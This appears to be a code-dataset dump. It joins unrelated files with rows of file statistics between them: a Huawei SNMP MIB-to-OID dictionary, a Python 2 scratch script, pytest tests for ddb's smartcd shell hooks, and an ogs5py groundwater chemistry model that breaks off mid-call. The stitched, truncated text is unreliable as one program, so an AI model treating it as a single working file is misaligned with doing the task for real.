"HUAWEI-SYS-MAN-MIB::hwPatchHistoryAction": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.7",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryBeginTime": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.8",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryEndTime": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.9",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorTable": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorSlot": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorPatchFileName": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1.3",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorPatchIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorCode": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1.5",
"HUAWEI-SYS-MAN-MIB::hwBootRom": "1.3.6.1.4.1.2011.5.25.19.1.11",
"HUAWEI-SYS-MAN-MIB::hwBootRomTable": "1.3.6.1.4.1.2011.5.25.19.1.11.1",
"HUAWEI-SYS-MAN-MIB::hwBootRomEntry": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1",
"HUAWEI-SYS-MAN-MIB::hwBootRomIndex": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwBootRomBootDevice": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwBootRomProcessorNo": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwBootRomHostName": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.4",
"HUAWEI-SYS-MAN-MIB::hwBootRomFileName": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.5",
"HUAWEI-SYS-MAN-MIB::hwBootRomIpOnEthernet": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.6",
"HUAWEI-SYS-MAN-MIB::hwBootRomIpOnBackPlane": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.7",
"HUAWEI-SYS-MAN-MIB::hwBootRomHostIp": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.8",
"HUAWEI-SYS-MAN-MIB::hwBootRomGatewayIp": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.9",
"HUAWEI-SYS-MAN-MIB::hwBootRomUserName": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.10",
"HUAWEI-SYS-MAN-MIB::hwBootRomPassword": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.11",
"HUAWEI-SYS-MAN-MIB::hwBootRomTargetName": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.12",
"HUAWEI-SYS-MAN-MIB::hwBootRomStartupScript": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.13",
"HUAWEI-SYS-MAN-MIB::hwBootRomXModemBaudRate": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.14",
"HUAWEI-SYS-MAN-MIB::hwBootRomVersion": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.15",
"HUAWEI-SYS-MAN-MIB::hwSysUpgrade": "1.3.6.1.4.1.2011.5.25.19.1.12",
"HUAWEI-SYS-MAN-MIB::hwSysUpgradeTable": "1.3.6.1.4.1.2011.5.25.19.1.12.1",
"HUAWEI-SYS-MAN-MIB::hwSysUpgradeEntry": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1",
"HUAWEI-SYS-MAN-MIB::hwIssuIndex": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwIssuMode": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwIssuImageFile": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwIssuPafFile": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1.4",
"HUAWEI-SYS-MAN-MIB::hwIssuLicenseFile": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1.5",
"HUAWEI-SYS-MAN-MIB::hwIssuState": "1.3.6.1.4.1.2011.5.25.19.1.12.2",
"HUAWEI-SYS-MAN-MIB::hwIssuConditionCheck": "1.3.6.1.4.1.2011.5.25.19.1.12.3",
"HUAWEI-SYS-MAN-MIB::hwSysSourceIndex": "1.3.6.1.4.1.2011.5.25.19.1.13",
"HUAWEI-SYS-MAN-MIB::hwSysSourceIndexTable": "1.3.6.1.4.1.2011.5.25.19.1.13.1",
"HUAWEI-SYS-MAN-MIB::hwSysSourceIndexEntry": "1.3.6.1.4.1.2011.5.25.19.1.13.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysFileType": "1.3.6.1.4.1.2011.5.25.19.1.13.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysFileName": "1.3.6.1.4.1.2011.5.25.19.1.13.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.13.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysRebootInfo": "1.3.6.1.4.1.2011.5.25.19.1.14",
"HUAWEI-SYS-MAN-MIB::hwSysRebootTimes": "1.3.6.1.4.1.2011.5.25.19.1.14.1",
"HUAWEI-SYS-MAN-MIB::hwSysRebootRecordTable": "1.3.6.1.4.1.2011.5.25.19.1.14.2",
"HUAWEI-SYS-MAN-MIB::hwSysRebootRecordEntry": "1.3.6.1.4.1.2011.5.25.19.1.14.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysRebootRecordIndex": "1.3.6.1.4.1.2011.5.25.19.1.14.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysRebootReason": "1.3.6.1.4.1.2011.5.25.19.1.14.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysRebootTime": "1.3.6.1.4.1.2011.5.25.19.1.14.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysDeviceCheck": "1.3.6.1.4.1.2011.5.25.19.1.15",
"HUAWEI-SYS-MAN-MIB::hwSysDeviceCheckStart": "1.3.6.1.4.1.2011.5.25.19.1.15.1",
"HUAWEI-SYS-MAN-MIB::hwSysDeviceCheckState": "1.3.6.1.4.1.2011.5.25.19.1.15.2",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverState": "1.3.6.1.4.1.2011.5.25.19.1.19",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverStateTable": "1.3.6.1.4.1.2011.5.25.19.1.19.1",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverStateEntry": "1.3.6.1.4.1.2011.5.25.19.1.19.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverStateIndex": "1.3.6.1.4.1.2011.5.25.19.1.19.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverSlotId": "1.3.6.1.4.1.2011.5.25.19.1.19.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverBoardType": "1.3.6.1.4.1.2011.5.25.19.1.19.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverInfo": "1.3.6.1.4.1.2011.5.25.19.1.19.1.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverStateMultiTable": "1.3.6.1.4.1.2011.5.25.19.1.19.2",
"HUAWEI-SYS-MAN-MIB::hwSysSwitchoverStateMultiEntry": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysMultiSwtStateIndex": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysMultiSwtChassisId": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysMultiSwtSlotId": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysMultiSwtBoardType": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysMultiSwtInfo": "1.3.6.1.4.1.2011.5.25.19.1.19.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFile": "1.3.6.1.4.1.2011.5.25.19.1.20",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileNum": "1.3.6.1.4.1.2011.5.25.19.1.20.1",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileTable": "1.3.6.1.4.1.2011.5.25.19.1.20.2",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileEntry": "1.3.6.1.4.1.2011.5.25.19.1.20.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.20.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileName": "1.3.6.1.4.1.2011.5.25.19.1.20.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileSize": "1.3.6.1.4.1.2011.5.25.19.1.20.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysVoiceFileLocation": "1.3.6.1.4.1.2011.5.25.19.1.20.2.1.4",
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIBNotifications": "1.3.6.1.4.1.2011.5.25.19.2",
"HUAWEI-SYS-MAN-MIB::hwSysClockChangedNotification": "1.3.6.1.4.1.2011.5.25.19.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysReloadNotification": "1.3.6.1.4.1.2011.5.25.19.2.2",
"HUAWEI-SYS-MAN-MIB::hwSysMasterHDError": "1.3.6.1.4.1.2011.5.25.19.2.3",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveHDError": "1.3.6.1.4.1.2011.5.25.19.2.4",
"HUAWEI-SYS-MAN-MIB::hwPatchTrap": "1.3.6.1.4.1.2011.5.25.19.2.5",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorTrap": "1.3.6.1.4.1.2011.5.25.19.2.5.1",
"HUAWEI-SYS-MAN-MIB::hwPatchActiveOverTimeTrap": "1.3.6.1.4.1.2011.5.25.19.2.5.2",
"HUAWEI-SYS-MAN-MIB::hwPatchMalfunctionComebackTrap": "1.3.6.1.4.1.2011.5.25.19.2.5.3",
"HUAWEI-SYS-MAN-MIB::hwPatchUpdateTrap": "1.3.6.1.4.1.2011.5.25.19.2.5.4",
"HUAWEI-SYS-MAN-MIB::hwSysMasterCfcardError": "1.3.6.1.4.1.2011.5.25.19.2.6",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveCfcardError": "1.3.6.1.4.1.2011.5.25.19.2.7",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchSuccessNotification": "1.3.6.1.4.1.2011.5.25.19.2.8",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchFailNotification": "1.3.6.1.4.1.2011.5.25.19.2.9",
"HUAWEI-SYS-MAN-MIB::hwSysIssuNotification": "1.3.6.1.4.1.2011.5.25.19.2.10",
"HUAWEI-SYS-MAN-MIB::hwPatchInstallFail": "1.3.6.1.4.1.2011.5.25.19.2.11",
"HUAWEI-SYS-MAN-MIB::hwPatchInstallFailClear": "1.3.6.1.4.1.2011.5.25.19.2.12",
"HUAWEI-SYS-MAN-MIB::hwSumUpgradeSuccess": "1.3.6.1.4.1.2011.5.25.19.2.13",
"HUAWEI-SYS-MAN-MIB::hwSysCfgFileErrorNotification": "1.3.6.1.4.1.2011.5.25.19.2.14",
"HUAWEI-SYS-MAN-MIB::hwSysImageErrorNotification": "1.3.6.1.4.1.2011.5.25.19.2.15",
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIBConformance": "1.3.6.1.4.1.2011.5.25.19.3",
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIBCompliances": "1.3.6.1.4.1.2011.5.25.19.3.1",
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIBGroups": "1.3.6.1.4.1.2011.5.25.19.3.2",
}
| 79.332061 | 96 | 0.631273 | 4,716 | 20,785 | 2.782019 | 0.063401 | 0.044512 | 0.223171 | 0.278963 | 0.635518 | 0.582774 | 0.498399 | 0.361357 | 0.346723 | 0.346723 | 0 | 0.248338 | 0.073563 | 20,785 | 261 | 97 | 79.636015 | 0.433008 | 0.021313 | 0 | 0 | 0 | 0.975709 | 0.853896 | 0.852027 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.004049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
79337aa3bcf0f0a0700c2982d3889104c51ce47f | 471 | py | Python | scratch/tmp.py | quenette/COMPASS-I | 73e4d1c17de8eddedb11d47cd27bac40024d3b30 | [
"Apache-2.0"
] | null | null | null | scratch/tmp.py | quenette/COMPASS-I | 73e4d1c17de8eddedb11d47cd27bac40024d3b30 | [
"Apache-2.0"
] | null | null | null | scratch/tmp.py | quenette/COMPASS-I | 73e4d1c17de8eddedb11d47cd27bac40024d3b30 | [
"Apache-2.0"
] | null | null | null | try:
i_stack.append( i )
except NameError:
i_stack = []
i = 0
try:
i_stack.append( i )
except NameError:
i_stack = []
i = 7
try:
i_stack.append( i )
except NameError:
i_stack = ()
i = 8
print i
print i_stack
try:
i = i_stack.pop()
except IndexError:
pass
print i
print i_stack
try:
i = i_stack.pop()
except IndexError:
pass
print i
print i_stack
try:
i = i_stack.pop()
except IndexError:
pass
print i
print i_stack
| 9.612245 | 23 | 0.630573 | 77 | 471 | 3.688312 | 0.168831 | 0.274648 | 0.15493 | 0.169014 | 0.989437 | 0.989437 | 0.989437 | 0.989437 | 0.989437 | 0.989437 | 0 | 0.008772 | 0.273885 | 471 | 48 | 24 | 9.8125 | 0.821637 | 0 | 0 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.085714 | 0 | null | null | 0.228571 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 11 |
f75e315be9c1fa43f3c8375d341bbc256a185eda | 4,856 | py | Python | tests/feature/smartcd/test_smartcd.py | gfi-centre-ouest/docker-devbox-ddb | 1597d85ef6e9e8322cce195a454de54186ce9ec7 | [
"MIT"
] | 4 | 2020-06-11T20:54:47.000Z | 2020-09-22T13:07:17.000Z | tests/feature/smartcd/test_smartcd.py | gfi-centre-ouest/docker-devbox-ddb | 1597d85ef6e9e8322cce195a454de54186ce9ec7 | [
"MIT"
] | 113 | 2019-11-07T00:40:36.000Z | 2021-01-18T12:50:16.000Z | tests/feature/smartcd/test_smartcd.py | inetum-orleans/docker-devbox-ddb | 20c713cf7bfcaf289226a17a9648c17d16003b4d | [
"MIT"
] | null | null | null | import os
import pytest
from pytest_mock import MockerFixture
from ddb.__main__ import main, load_registered_features
from ddb.feature import features
from ddb.feature.core import CoreFeature
from ddb.feature.shell import ShellFeature
from ddb.feature.smartcd import SmartcdFeature, SmartcdAction, WindowsProjectActivate
@pytest.mark.skipif("os.name == 'nt'")
class TestSmartcdAction:
def test_empty_project_without_core(self, project_loader, mocker: MockerFixture):
mocker.patch('ddb.feature.smartcd.actions.is_smartcd_installed', lambda: True)
project_loader("empty")
features.register(SmartcdFeature())
load_registered_features()
action = SmartcdAction()
action.execute()
assert not os.path.exists(".bash_enter")
assert not os.path.exists(".bash_leave")
def test_empty_project_with_core(self, project_loader, mocker: MockerFixture):
mocker.patch('ddb.feature.smartcd.actions.is_smartcd_installed', lambda: True)
project_loader("empty")
features.register(CoreFeature())
features.register(SmartcdFeature())
load_registered_features()
action = SmartcdAction()
action.execute()
assert not os.path.exists(".bash_enter")
assert not os.path.exists(".bash_leave")
def test_empty_project_with_activate_deactivate_commands(self, project_loader, mocker: MockerFixture):
mocker.patch('ddb.feature.smartcd.actions.is_smartcd_installed', lambda: True)
project_loader("empty")
features.register(CoreFeature())
features.register(ShellFeature())
features.register(SmartcdFeature())
load_registered_features()
action = SmartcdAction()
action.execute()
assert os.path.exists(".bash_enter")
assert os.path.exists(".bash_leave")
with open(".bash_enter") as f:
content = f.read()
assert "$(ddb activate)" in content
with open(".bash_leave") as f:
assert "$(ddb deactivate)" in f.read()
def test_empty_project_main(self, project_loader, mocker: MockerFixture):
mocker.patch('ddb.feature.smartcd.actions.is_smartcd_installed', lambda: True)
project_loader("empty")
main(["configure"])
assert os.path.exists(".bash_enter")
assert os.path.exists(".bash_leave")
with open(".bash_enter") as f:
content = f.read()
assert "$(ddb activate)" in content
with open(".bash_leave") as f:
assert "$(ddb deactivate)" in f.read()
def test_empty_project_main_no_smartcd(self, project_loader, mocker: MockerFixture):
mocker.patch('ddb.feature.smartcd.actions.is_smartcd_installed', lambda: False)
project_loader("empty")
main(["configure"])
assert not os.path.exists(".bash_enter")
assert not os.path.exists(".bash_leave")
@pytest.mark.skipif("os.name != 'nt'")
class TestWindowsProjectActivate:
def test_empty_project_without_core(self, project_loader):
project_loader("empty")
features.register(SmartcdFeature())
load_registered_features()
action = WindowsProjectActivate()
action.execute()
assert not os.path.exists("ddb_activate.bat")
assert not os.path.exists("ddb_deactivate.bat")
def test_empty_project_with_core(self, project_loader):
project_loader("empty")
features.register(CoreFeature())
features.register(SmartcdFeature())
load_registered_features()
action = WindowsProjectActivate()
action.execute()
assert not os.path.exists("ddb_activate.bat")
assert not os.path.exists("ddb_deactivate.bat")
def test_empty_project_with_activate_deactivate_commands(self, project_loader):
project_loader("empty")
features.register(CoreFeature())
features.register(ShellFeature())
features.register(SmartcdFeature())
load_registered_features()
action = WindowsProjectActivate()
action.execute()
assert os.path.exists("ddb_activate.bat")
assert os.path.exists("ddb_deactivate.bat")
with open("ddb_activate.bat") as f:
assert "set command=(ddb activate)" in f.read()
with open("ddb_deactivate.bat") as f:
assert "set command=(ddb deactivate)" in f.read()
def test_empty_project_main(self, project_loader):
project_loader("empty")
main(["configure"])
assert os.path.exists("ddb_activate.bat")
assert os.path.exists("ddb_deactivate.bat")
with open("ddb_activate.bat") as f:
assert "set command=(ddb activate)" in f.read()
with open("ddb_deactivate.bat") as f:
assert "set command=(ddb deactivate)" in f.read()
| 31.329032 | 106 | 0.669481 | 556 | 4,856 | 5.645683 | 0.120504 | 0.074546 | 0.068812 | 0.047786 | 0.89519 | 0.89519 | 0.885314 | 0.866837 | 0.866837 | 0.828289 | 0 | 0 | 0.219316 | 4,856 | 154 | 107 | 31.532468 | 0.828014 | 0 | 0 | 0.788462 | 0 | 0 | 0.179572 | 0.049423 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.086538 | false | 0 | 0.076923 | 0 | 0.182692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f768c671923cbd81ce045ab7122f4799ee250e89 | 8,982 | py | Python | benchmarks/C/calcite_ChemApp/eq.py | GeoStat-Framework/ogs5py_benchmarks | 0b6db19b87cfad36459757f99ce2458f8e12b20b | [
"BSD-4-Clause"
] | 3 | 2019-01-15T17:38:11.000Z | 2020-01-07T23:44:12.000Z | benchmarks/C/calcite_ChemApp/eq.py | GeoStat-Framework/ogs5py_benchmarks | 0b6db19b87cfad36459757f99ce2458f8e12b20b | [
"BSD-4-Clause"
] | 1 | 2020-05-12T09:18:09.000Z | 2020-05-12T10:48:32.000Z | benchmarks/C/calcite_ChemApp/eq.py | GeoStat-Framework/ogs5py_benchmarks | 0b6db19b87cfad36459757f99ce2458f8e12b20b | [
"BSD-4-Clause"
] | 1 | 2020-01-08T13:28:50.000Z | 2020-01-08T13:28:50.000Z | # -*- coding: utf-8 -*-
from ogs5py import OGS
model = OGS(
task_root='eq_root',
task_id='eq',
output_dir='out',
)
model.msh.read_file('eq.msh')
model.gli.read_file('eq.gli')
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='GROUNDWATER_FLOW',
NUM_TYPE='NEW',
ELEMENT_MATRIX_OUTPUT=0,
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.pcs.add_block(
main_key='PROCESS',
PCS_TYPE='MASS_TRANSPORT',
NUM_TYPE='NEW',
)
model.rfd.read_file('eq.rfd')
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='GROUNDWATER_FLOW',
PRIMARY_VARIABLE='HEAD',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 200000.0],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='pH',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 7.0],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='O',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 3e-10],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Mg',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 0.001],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Ca',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 1e-10],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Cl',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 0.002],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='C',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 1e-10],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Calcite',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 1e-12],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Dolomite(dis)',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 1e-12],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Magnesite',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 0.0],
)
model.bc.add_block(
main_key='BOUNDARY_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Eh',
GEO_TYPE=['POINT', 'POINT0'],
DIS_TYPE=['CONSTANT', 0.0],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='GROUNDWATER_FLOW',
PRIMARY_VARIABLE='HEAD',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 200000.0],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='pH',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 9.91],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='O',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.000369],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Mg',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 1e-12],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Ca',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.000123],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Cl',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 2e-12],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='C',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.000123],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Calcite',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.000207],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Dolomite(dis)',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 1e-10],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Magnesite',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.0],
)
model.ic.add_block(
main_key='INITIAL_CONDITION',
PCS_TYPE='MASS_TRANSPORT',
PRIMARY_VARIABLE='Eh',
GEO_TYPE='DOMAIN',
DIS_TYPE=['CONSTANT', 0.0],
)
model.st.add_block(
main_key='SOURCE_TERM',
PCS_TYPE='GROUNDWATER_FLOW',
PRIMARY_VARIABLE='HEAD',
GEO_TYPE=['POINT', 'POINT1'],
DIS_TYPE=['CONSTANT', -2.9976852e-06],
)
model.mmp.add_block(
main_key='MEDIUM_PROPERTIES',
GEOMETRY_DIMENSION=1,
GEOMETRY_AREA=1.0,
POROSITY=[1, 0.32],
TORTUOSITY=[1, 1.0],
PERMEABILITY_TENSOR=['ISOTROPIC', 1.157e-12],
MASS_DISPERSION=[1, 0.0067, 0.1],
DENSITY=[1, 1800.0],
)
model.msp.add_block(
main_key='SOLID_PROPERTIES',
DENSITY=[1, 1800.0],
)
model.mfp.add_block(
main_key='FLUID_PROPERTIES',
FLUID_TYPE='LIQUID',
PCS_TYPE='HEAD',
DENSITY=[1, 1000.0],
VISCOSITY=[1, 0.001],
HEAT_CAPACITY=[1, 0.0],
HEAT_CONDUCTIVITY=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='pH',
MOBILE=0,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='O',
MOBILE=1,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Mg',
MOBILE=1,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Ca',
MOBILE=1,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Cl',
MOBILE=1,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='C',
MOBILE=1,
DIFFUSION=[1, 0.0],
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Calcite',
MOBILE=0,
DIFFUSION=0,
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Dolomite(dis)',
MOBILE=0,
DIFFUSION=0,
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Magnesite',
MOBILE=0,
DIFFUSION=0,
)
model.mcp.add_block(
main_key='COMPONENT_PROPERTIES',
NAME='Eh',
MOBILE=0,
DIFFUSION=0,
)
model.num.add_block(
main_key='NUMERICS',
PCS_TYPE='GROUNDWATER_FLOW',
